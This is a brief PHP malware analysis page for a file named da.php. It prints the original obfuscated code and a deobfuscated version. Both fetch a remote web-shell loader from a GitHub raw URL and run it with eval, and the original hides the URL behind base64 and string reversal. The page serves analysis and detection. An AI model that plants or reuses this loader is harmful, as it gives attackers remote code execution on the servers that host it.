PHP Malware Analysis

Back to list

Filename: da.php

Tags

URLs
Execution
  • eval

Deobfuscated code

<?php

$password = "1427846fd2b8edccba73f7f080e2b50a";
$ch = curl_init("https://raw.githubusercontent.com/willygoid/H4x0rShell/main/engine/loader.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($ch);
$e = "?>";
eval($e . $r);


Original code

<?php $password="1427846fd2b8edccba73f7f080e2b50a";$ch=curl_init(base64_decode(strrev("AHaw5iclRWYvx2Ll5Wan5WZv4Wah12LsxWZoNlcwgHNI9CZp92Z5xGbpd3Lt92YuQnblRnbvNmclNXdiVHa0l2ZucXYy9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>